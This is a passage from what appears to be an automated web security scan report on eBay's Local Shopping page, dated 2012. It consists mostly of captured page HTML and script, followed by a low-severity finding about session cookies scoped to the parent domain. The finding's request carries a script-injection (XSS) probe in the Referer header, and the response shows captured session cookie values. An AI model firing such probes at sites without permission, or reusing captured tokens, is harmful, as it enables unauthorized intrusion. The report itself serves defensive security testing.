</script><script type="text/javascript">vjo.darwin.globalnav.util.DoctypeSupport.init();</script><script type="text/javascript">var _oGlobalNavRTMInfo={};_oGlobalNavRTMInfo.aRTMPlacementData=[];_oGlobalNavRTMInfo.aRTMPlacementData=[{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_433","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"433","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_876","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"876","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_912","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"912","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1650","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1650","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1651","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1651","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false}];</script><!--@sghp@ headerStyle=HALF:HOMEPAGE:CGI @eghp@--><div id="CenterPanel" class="cntr"><div class="cont" style="margin-left:0">


<div class="srpbx" id="srpbx">
   <div class="srpbxLft">
   </div>

   <div style="padding:10px 10px 10px 25px"><span style="font-weight:bold;font-size:24px;color:#2F50BC;">Local Shopping <sup style="font-size:11px;color:#000">Beta</sup></span>
       <div style="font:normal small arial;padding-top:5px">Need it fast? Find what you're looking for in a store near you.</div>
   </div>
<!--    <div>
        <div class="srplb">Search locally to find the best deals in your area... <span class="rt">Right now, on eBay</span></div>
   </div>
-->    
   <div style="margin-left:-72px;z-index:5;position:relative;">
       <form action="/local/localsch.html" method="get" id="schfrm" onsubmit="return vjo.ebay.local.localmap.LocalMap.onSubmit();">
           <div class="fm-cnt">
               <div class="srps">
                   <input type="submit" id="but" value="Search" class="srpbt" tabindex="2" />
               </div>
               <div class="srpi">
                   <input type="text" id="searchbox" name="_nkw" placeholder="Search locally " autofocus="autofocus" autocomplete="off" tabindex="1" />
               </div>
               <div>                    
                       <span class="near-txt">Near</span><input class="zipcode" autocomplete="off" name="_location" id="_location" value="75217" size="50" title="Enter Location" tabindex="3" placeholder="Enter valid U.S ZIP Code">
                       <div id="autocomplete" class="autocomplete"></div>                        
                   
                       <a href="javascript:;" title="Change Location" type="change" id="loc_change" tabindex="4">Change</a>
                   <span id="err" style="display:none;color:red">Could not find the location.</span>
                   &nbsp;<a href="javascript:;" id="resetloc" style="">| <span>Current Location</span></a>
                   
                   <div class="clr"></div>
               </div>
               <div class="clr"></div>
           </div>
           
           <fontT><div class="srpMar"><b></b><span>Over 50,000 local stores including:</span>
           <span class="ff">
               <span class="fs" id="merchantFs">
           <span class="preS"><a class="pre db" id="pre" href="javascript:;" tabindex="6"></a></span>
       <div class="cntWrap" id="cntWrap1" style="width:252px;overflow:hidden">
    <div class="cnt" id="cnt1" style="width:10000px"><img title="Fry's Electronics" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/3040.png"><img title="Best Buy" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1779.png"><img title="Sears" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1609.png"><img title="Micro Center" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/3713.png"><img title="Target" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1792.png"><img title="Staples" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1825.png"><img title="Armani Exchange" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12863.png"><img title="Loft" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12843.png"><img title="Sunglass Hut" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12850.png"><img title="JCPenney" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/6740.png"><img title="Nordstrom" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/10390.png"><img title="Ikea" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/8615.png"><img title="Golf Smith" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/5461.png"><img title="Office Depot" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1848.png"><img title="Toys R Us" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/5893.png"><img title="RadioShack" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1829.png"><img title="Container Store" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12861.png"><img title="Guitar Center" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/7374.png"><img title="Macy's" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/10617.png"><img title="GameStop" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/9386.png"><img title="Lowe's" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/4483.png">
    </div>
       </div><span class="nextS"><a class="next enab " id="next" href="javascript:;" tabindex="7"></a></span>
       <div class="clr"></div>
               </span>
           </span>
           </div><fontT>
           <input type="hidden" id="_fpos" name="_fpos" value="75217">
           
               <input type="hidden" id="_trksid" name="_trksid" value="p5791.m1">
           
       </form>
   </div>
   <input type="hidden" id="zip" value="75217">
   
   <div style="position:absolute;right:25px;top:30px;color:#333;display:none;" id="loading"><span>Loading </span><img src="/local/images.i?file=miniThrobber.gif" /></div>
   
   
</div>    

<div id="map_canvas" class="mainmap"></div>

</div></div><div id="linfo" class="loc-info">    
   
   <div>
                               <div class="loc-ttl">
                                   <fontt><a id="ecArr" href="javascript:;"><b></b></a></fontt>
                               </div>
                               <div style="position: absolute; font-size: 10px; right: 10px;">Pricing &amp; inventory <a href="/local/disclaimer.html" target="blank">subject to Terms</a></div>
                               <div id="cntWrapper" class="loc-cntW">
                                   <table id="cntDiv" class="loc-cnt" style="width: 100%;table-layout:fixed" cellpadding="0" cellspacing="0">
                                   <tbody><tr>
                                   
                                       <td class="loc-tkt" align='center' >
                                           <div class="loc-cntTtl" >Popular Products</div>
                                           <div id="fsWrp1" class="loc-fsW" style="min-width:872px;max-width:1136px;" >
                                               <a id="fsLa1" href="javascript:;" class="loc-fsA loc-fsLd"></a>
                                               <div class="rImg">
                                                   <div id="fsCnt1" class="loc-fsCnt" style="min-width:872px;max-width:1136px;" >
                                                       <div id="fsDiv1" class="loc-fsItmW">
                                                       <div class="dealWrap" id="6711615" coords="32.874857,-96.76977,5893,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/5893.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/007/765/854/200/7765169_8076854_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=6711615&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Barbie Collector Pink Label Pop Icon Barbie Doll'>Barbie Collector Pink Label Pop Icon Barbie Doll</a>
</div><div class="price"><span class="price">$49.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="836501" coords="32.868267,-96.775289,10390,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/10390.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/001/826/204/200/1826528_3887204_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=836501&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Est..e Lauder 'pleasures intense' Eau de Parfum Spray'>Est..e Lauder 'pleasures intense' Eau de Parfum Spray</a>
</div><div class="price"><span class="price">$75.00<span class="sep">-</span>$78.00</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="16708043" coords="32.9274,-96.814,1792,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1792.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/011/470/797/200/11470903_18708797_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=16708043&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Barbie Collector-Fam CHLD Doll Inspired By Gustav Klimt'>Barbie Collector-Fam CHLD Doll Inspired By Gustav Klimt</a>
</div><div class="price"><span class="price">$34.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="3796192" coords="32.931615,-96.821136,1779,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1779.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/003/928/783/200/3928925_6196783_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=3796192&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Microsoft - Xbox 360 4GB Console with Kinect'>Microsoft - Xbox 360 4GB Console with Kinect</a>
</div><div class="price"><span class="price">$299.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="19582113" coords="32.68162,-97.111413,13331,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/13331.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/014/458/256/200/14458643_18843256_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=19582113&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Xbox 360 4GB Kinect Super Bundle'>Xbox 360 4GB Kinect Super Bundle</a>
</div><div class="price"><span class="price">$429.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="19001723" coords="32.91079,-96.95881,9386,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/9386.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/013/990/960/200/13990309_17354960_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=19001723&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Microsoft Xbox 360 Kinect 4GB for Xbox 360'>Microsoft Xbox 360 Kinect 4GB for Xbox 360</a>
</div><div class="price"><span class="price">$249.99</span>
</div>
</div>
<div class="clr"></div></div>
                                                       </div>
                                                   </div>
                                               </div>
                       
                                               <a id="fsRa1" href="javascript:;" class="loc-fsA loc-fsRa"></a>
                                           </div>
                                       </td>
                                   
                                   
                               </tr>
                           </table>
                       </div>
                   </div>
</div><div class="footer"><div class="coreFooterLinks" id="glbfooter"><div><div id="rtm_html_1650"></div><div id="rtm_html_1651"></div></div><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td class="g-pipe"><img src="http://q.ebaystatic.com/aw/pics/s.gif" height="10" width="1" alt=""><br><a href="http://www.ebayinc.com" _sp="m571.l2602">About eBay</a> | <a href="http://pages.ebay.com/securitycenter/index.html" _sp="m571.l2616">Security Center</a> | <a href="http://pages.ebay.com/buy/tools.html" _sp="m571.l2603">Buyer Tools</a> | <a href="http://pages.ebay.com/help/policies/overview.html" _sp="m571.l2604">Policies</a> | <a href="http://stores.ebay.com/" _sp="m571.l2605">Stores</a> | <a href="http://my.ebay.com/wishlistsearch" _sp="m571.l2898">eBay Wish list</a> | <a href="http://pages.ebay.com/sitemap.html" _sp="m571.l1625">Site Map</a> | <a href="http://viv.ebay.com/ws/eBayISAPI.dll?EbayTime" _sp="m571.l2606">eBay official time</a> | <a href="http://garden.ebay.com" _sp="m571.l1617">Preview new features</a> | <a href="http://qu.ebay.com/survey?srvName=globalheader+%28footer-US%29" id="gh-surveyLink" target="eBaySurvey" _sp="m571.l2628" rel="nofollow">Tell us what you think</a><form action="http://qu.ebay.com/survey?srvName=globalheader+%28footer-US%29" id="gh-surveyForm" method="post" target="eBaySurvey" class="gh-hdn g-hdn"><input name="domContent" value=""></form></td></tr><tr><td height="5"></td></tr><tr><td height="1" bgcolor="#dddddd" colspan="2"></td></tr><tr><td height="10"></td></tr><tr class="g-hlp" valign="top"><td class="g-nav coreFooterLegalNotice">Copyright .. 1995-2012 eBay Inc. All Rights Reserved. Designated trademarks and brands are the property of their respective owners. Use of this Web site constitutes acceptance of the eBay <a href="http://pages.ebay.com/help/policies/user-agreement.html?rt=nc" _sp="m571.l2612">User Agreement</a> and <a href="http://pages.ebay.com/help/policies/privacy-policy.html?rt=nc" _sp="m571.l2613">Privacy Policy</a>.<br><img src="http://q.ebaystatic.com/aw/pics/s.gif" height="20" alt=""></td></tr></table><div id="cobrandFooter"></div></div><script type="text/javascript">var _GlobalNavHeaderStatic=false, _GlobalNavHeaderCookieTracking=true, _GlobalNavHeaderSrcPageId=3872; var un="undefined";if(typeof(vjo)!=un && typeof(vjo.darwin)!=un && typeof(vjo.darwin.globalnav)!=un) vjo.darwin.globalnav.util.SGuid.writeSessionGuid("ab23d4ae1340a03664168136ff4b32e9");vjo.darwin.core.ebayheader.rover.FooterRover.roverService("http://rover.ebay.com/idmap/0?footer");; if(vjo && vjo.darwin && vjo.darwin.globalnav && vjo.darwin.globalnav.rtm && vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall)vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall.submitRTMCall("http://ir.ebaystatic.com/v4js/z/ur/grupfpzzoq4wjpypydpyjswhd.js");</script><script src="http://include.ebaystatic.com/js/e687/us/ebayfooter_cobrand_v4_e6871us.js"></script><!--@sgfp@ footerStyle=normal:CGI @egfp@--></div></div><script type="text/javascript" src="http://maps.googleapis.com/maps/api/js?v=3.4&amp;client=gme-ebayinc1&amp;sensor=true"></script><script src="/local/localjs.js"></script><script type="text/javascript">var distances = new Array(0.5, 1, 2, 5, 10, 15, 20, 25, 50, 100);
var _sadis = document.getElementById("_flprad");
// locSliderGetElementByID: Cross-browser version of "document.getElementById()"
function locSliderGetElementById(element) {
   if (document.getElementById) element = document.getElementById(element);
   else if (document.all) element = document.all[element];
   else element = null;
   return element;
}

// locSliderLeft: Cross-browser version of "element.style.left"
function locSliderLeft(elmnt, pos) {
   if (!(elmnt = locSliderGetElementById(elmnt))) return 0;
   if (elmnt.style && (typeof(elmnt.style.left) == 'string')) {
       if (typeof(pos) == 'number') elmnt.style.left = pos + 'px';
       else {
           pos = parseInt(elmnt.style.left);
           if (isNaN(pos)) pos = 0;
       }
   }
   else if (elmnt.style && elmnt.style.pixelLeft) {
       if (typeof(pos) == 'number') elmnt.style.pixelLeft = pos;
       else pos = elmnt.style.pixelLeft;
   }
   return pos;
}

function setPos (distance) {
   var index = 0;
   /*for(var i=0,l=distances.length;i<l; i++){
       if(distance == distances[i]) {
           index = i;
           break;
       }
   }
   var pos = locSliderLeft("slider", (index*12.8)+6);
   document.getElementById("display").innerHTML = distance + " miles"; // put the new value in the slider display element
   document.getElementById("progress").style.width = (pos+30)+"px";*/
   _sadis.value = distance;
}
// slide: Handles the start of a slider move.
function slide(evnt, slider, left, right, display, progress, progressOffset) {
   if (!evnt) {
evnt = window.event;
   }
   sliderObj = locSliderGetElementById(slider);
   displayObj = locSliderGetElementById(display);
   progressObj = locSliderGetElementById(progress);
   progressObjOffset = progressOffset
   xLeft = left;
   xRight = right;
   pxLeft = locSliderLeft(sliderObj.id);
   xStart = evnt.screenX; // Horizontal mouse position at start of slide.
   mouseover = true;
   document.onmousemove = moveSlider; // Start the action if the mouse is dragged.
   document.onmouseup = sliderMouseUp; // Stop sliding.
}

// moveSlider: Handles slider and display while dragging
function moveSlider(evnt) {
   var evnt = (!evnt) ? window.event : evnt; // The mousemove event
   if (mouseover) { // Only if slider is dragged
       x = pxLeft + evnt.screenX - xStart; // Horizontal mouse position relative to allowed slider positions
       // Limit horizontal movement
       if (x > xRight) {
       x = xRight;
       }
       if (x < xLeft) {
        x = xLeft;
       }
       locSliderLeft(sliderObj.id, x); // move slider to new horizontal position
       distance = distances[Math.min(Math.round((x - xLeft) * distances.length / (xRight - xLeft)), distances.length - 1)]; // distance selection
       displayObj.innerHTML = distance + " miles"; // put the new value in the slider display element
       _sadis.value = distance;

       progressObj.style.width = (x + progressObjOffset - xLeft) + "px";
       
       return false
   }
   return
}
// sliderMouseup: Handles the mouseup event after moving a slider.
// Snaps the slider position to allowed/displayed value.
function sliderMouseUp() {
   mouseover = false // Stop the sliding.
   if (document.removeEventListener) { // Remove event listeners from 'document' (Mozilla).
       document.removeEventListener('mousemove', moveSlider, false)
       document.removeEventListener('mouseup', sliderMouseUp, false)
   }
   else if (document.detachEvent) { // Remove event listeners from 'document' (IE).
       document.detachEvent('onmousemove', moveSlider)
       document.detachEvent('onmouseup', sliderMouseUp)
   }
   //document.distanceForm.submit();
   submitDistance();
}

function submitDistance(){
   var t=this, zip = document.getElementById("_fpos"),zipName,disName;
   if(!zip || (zip && !(zipName=zip.getAttribute("name"))) || !_sadis ||(_sadis && !(disName=_sadis.getAttribute("name")))) return;
   var url = document.location.href;
   if(zipName == '_fpos') {
       var value = zip.value;
       url = vjo.dsf.utils.URL.addArg(url, '_fpos', value);
   }
   if(disName == '_flprad') {
       var value1 = _sadis.value;
       url = vjo.dsf.utils.URL.addArg(url, '_flprad', value1);
   }else {
       return;
   }        
   window.location = url;
   }

</script><script type="text/javascript">(function () {
var _r = vjo.Registry;
_r.put('0',new vjo.dsf.utils.SiteSpeed()); })();
(function(){
var _d=vjo.dsf.EventDispatcher;
var _r=vjo.Registry;
_d.add('body','load',function(event) { this.setData({"placeholder":"Enter valid U.S ZIP Code","jsId":"merFs","trkId":"p5791.m1","data":{"numResults":0,"localPickupModel":null,"errorMap":null,"noProductFound":false,"location":"75217","deals":[{"highPrice":null,"highPriceValue":null,"productId":1555065,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":123,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":{"value":8,"id":8,"name":"4-5","integer":8},"WARLayerOnLoad":false},"noPriceIn":false,"url":"http://www.ebay.com/ctg/mp.html?_flppid=1555065&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":false,"imageUrl":"http://imagethumbnails.milo.com/001/477/311/200/1477662_16111311_200.jpg","lowPrice":{"valueInMinorUnits":1299,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":12990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"reviewCount":123,"title":"St. John's Bay.. Carl Men's Suede Slipper","offerIds":"1477662","numLocalStore":1,"lowPriceValue":"$12.99","miloProductOfferModel":[{"merchantTitle":"JCPenney","merchantId":6740,"linkUrl":null,"location":{"merchantName":"JCPenney","latitude":32.605204,"merchantLogoUrl":"http://milo.com/images/stores/6740.jpg","longitude":-96.929276},"RTPalUrl":null,"price":{"valueInMinorUnits":1299,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":12990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/6740.png"}],"ratingNode":"<span class=\"rw\" style=\"height: 12px; background-position: 0pt -10px;\">\n <span class=\"rstar\" style=\"height: 12px; background-position: 0pt 1px; width: 60.75px\"><\/span>\n<\/span><span class=\"revCnt\">(123)<\/span>"},{"highPrice":null,"highPriceValue":null,"productId":17884273,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":3,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":{"value":8,"id":8,"name":"4-5","integer":8},"WARLayerOnLoad":false},"noPriceIn":false,"url":"http://www.ebay.com/ctg/mp.html?_flppid=17884273&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":false,"imageUrl":"http://imagethumbnails.milo.com/012/294/502/200/12294522_16262502_200.jpg","lowPrice":{"valueInMinorUnits":700,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":7000000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":true},"reviewCount":3,"title":"Dearfoam.. Closed Back Slipper","offerIds":"12294522","numLocalStore":1,"lowPriceValue":"$7.00","miloProductOfferModel":[{"merchantTitle":"JCPenney","merchantId":6740,"linkUrl":null,"location":{"merchantName":"JCPenney","latitude":32.605204,"merchantLogoUrl":"http://milo.com/images/stores/6740.jpg","longitude":-96.929276},"RTPalUrl":null,"price":{"valueInMinorUnits":700,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":7000000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":true},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/6740.png"}],"ratingNode":"<span class=\"rw\" style=\"height: 12px; background-position: 0pt -10px;\">\n <span class=\"rstar\" style=\"height: 12px; background-position: 0pt 1px; width: 60.75px\"><\/span>\n<\/span><span class=\"revCnt\">(3)<\/span>"},{"highPrice":null,"highPriceValue":null,"productId":1555085,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":130,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":{"value":8,"id":8,"name":"4-5","integer":8},"WARLayerOnLoad":false},"noPriceIn":false,"url":"http://www.ebay.com/ctg/mp.html?_flppid=1555085&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":false,"imageUrl":"http://imagethumbnails.milo.com/001/477/312/200/1477683_16111312_200.jpg","lowPrice":{"valueInMinorUnits":1299,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":12990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"reviewCount":130,"title":"St. John's Bay.. Dale Men's Suede Slipper","offerIds":"1477683","numLocalStore":1,"lowPriceValue":"$12.99","miloProductOfferModel":[{"merchantTitle":"JCPenney","merchantId":6740,"linkUrl":null,"location":{"merchantName":"JCPenney","latitude":32.605204,"merchantLogoUrl":"http://milo.com/images/stores/6740.jpg","longitude":-96.929276},"RTPalUrl":null,"price":{"valueInMinorUnits":1299,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":12990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/6740.png"}],"ratingNode":"<span class=\"rw\" style=\"height: 12px; background-position: 0pt -10px;\">\n <span class=\"rstar\" style=\"height: 12px; background-position: 0pt 1px; width: 60.75px\"><\/span>\n<\/span><span class=\"revCnt\">(130)<\/span>"}],"title":"","trkId":null,"localLandingLeftNavModel":null,"numOfResults":0,"topProducts":[{"highPrice":null,"highPriceValue":null,"productId":6711615,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":6,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":{"value":9,"id":9,"name":"5","integer":9},"WARLayerOnLoad":false},"noPriceIn":false,"url":"http://www.ebay.com/ctg/mp.html?_flppid=6711615&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":false,"imageUrl":"http://imagethumbnails.milo.com/007/765/854/200/7765169_8076854_200.jpg","lowPrice":{"valueInMinorUnits":4999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":49990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"reviewCount":6,"title":"Barbie Collector Pink Label Pop Icon Barbie Doll","offerIds":"7765169","numLocalStore":1,"lowPriceValue":"$49.99","miloProductOfferModel":[{"merchantTitle":"Toys\"R\"Us","merchantId":5893,"linkUrl":null,"location":{"merchantName":"Toys\"R\"Us","latitude":32.874857,"merchantLogoUrl":"http://milo.com/images/stores/5893.jpg","longitude":-96.76977},"RTPalUrl":null,"price":{"valueInMinorUnits":4999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":49990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/5893.png"}],"ratingNode":"<span class=\"rw\" style=\"height: 12px; background-position: 0pt -10px;\">\n <span class=\"rstar\" style=\"height: 12px; background-position: 0pt 1px; width: 67.5px\"><\/span>\n<\/span><span class=\"revCnt\">(6)<\/span>"}],"ticketModel":null},"zipcode":"75217"}); },vjo.ebay.local.localmap.LocalMap);_d.add('body','load',function(event) { this.init({"leftFsPages":6,"jsId":"localinfoFs","content":true,"rightFs":false,"rightFsPages":0}); },vjo.ebay.local.localinfo.LocalInfo);_d.add('body','load',function(event) { this.init("75217", "1"); },vjo.ebay.local.LocalLandingPage);})();
</script></body></html><!--RcmdId LocalDomain-dcp,RlogId jh%60djkbkbnmbvfd%60%3C%3Dsm%2Bpu%28c5%3Ba6c0-134ac89d7c1-->

2.14. http://local.ebay.com/local/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://local.ebay.com
Path:   /local/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /local/ HTTP/1.1
Referer: http://local.ebay.com/local/localsch.html-_nkw=xss&_location=75217&_fpos=75217&_trksid=p5791.m1&dc13b%22%3E%3Cscript%3Ealert%281%29%3C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: local.ebay.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 10






Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: jh%60djkbkbnmbvfd%60%3C%3Ds%7D%2Bpu56*%3Bc6cb0g-134ac89d77f
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: ebay=%5Ecv%3D15555%5E; Domain=.ebay.com; Path=/
Set-Cookie: s=CgAD4ACBPBpOCYWM4OWQ3N2YxMzQwYTAyYTIzNjdlODc3ZmZmZmU1MWQRj5v2; Domain=.ebay.com; Path=/
Set-Cookie: nonsession=CgADKACBYa0OCYWM4OWQ3N2YxMzQwYTAyYTIzNjdlODc3ZmZmZmU1MWQAywABTwVJCjHC3S6T; Domain=.ebay.com; Expires=Fri, 04-Jan-2013 06:24:02 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 35127
Date: Thu, 05 Jan 2012 06:24:02 GMT

